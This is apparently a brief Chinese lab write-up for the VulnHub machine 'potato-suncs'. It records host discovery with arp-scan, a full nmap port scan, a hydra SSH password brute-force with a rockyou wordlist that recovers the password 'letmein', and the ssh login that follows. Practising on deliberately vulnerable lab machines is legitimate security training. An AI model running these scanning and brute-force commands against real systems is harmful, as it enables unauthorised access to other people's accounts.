VulnHub—potato-suncs

Lspecialnx_2025-01-07 13:35

使用命令扫描靶机ip

arp-scan -l

尝试访问一下ip

发现一个大土豆没什么用

尝试扫描一下子域名

没有发现什么有用的信息

尝试扫描端口

namp -A 192.168.19.137 -p-

尝试访问一下端口,发现都访问不进去

查看源代码发现了网页的标题 potato,就想着爆破一下密码

hydra -l potato -P '/home/kali/桌面/rockyou-part1(1-25000).txt' ssh://192.168.19.137 -s 7120

爆破结果是密码为"letmein"

ssh [email protected] -p 7120

尝试登录一下ssh

相关推荐
拾柒SHY36 分钟前
iwebsec-SQL数字型注入
数据库·sql·web安全·网络安全
网络安全小吗喽3 小时前
靶场(十三)---小白心得&&思路分享---Levram
linux·运维·服务器·测试工具·安全·网络安全
Damon小智3 小时前
C#进阶-ASP.NET网站会话固定漏洞的解决
网络安全·c#·asp.net·漏洞修复·会话固定
菜根Sec16 小时前
网络安全证书培训机构有哪些
安全·web安全·网络安全
H轨迹H1 天前
Hack The Box-代理连接及靶机-Meow-喵呜
网络安全·渗透测试·hack the box·web漏洞
橙子20252 天前
文件解析漏洞靶场集锦详解
安全·web安全·网络安全
白帽少女安琪拉2 天前
24.pocsuite3:开源的远程漏洞测试框架
网络·网络安全
go_to_hacker2 天前
奇安信二面
网络·web安全·网络安全·渗透测试·代码审计·春招
黑客笔记2 天前
网络安全常识科普(百问百答)
计算机网络·web安全·网络安全
热门推荐
01命令行方式将mysql数据库迁移到达梦数据库(全步骤)02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03DeepSeek各版本说明与优缺点分析04本地部署DeepSeek教程(Mac版本)05如何在WPS和Word/Excel中直接使用DeepSeek功能06本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程07四大AI编程工具组合测评08DeepSeek RAGFlow构建本地知识库系统09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10LLM主流框架:Causal Decoder、Prefix Decoder和Encoder-Decoder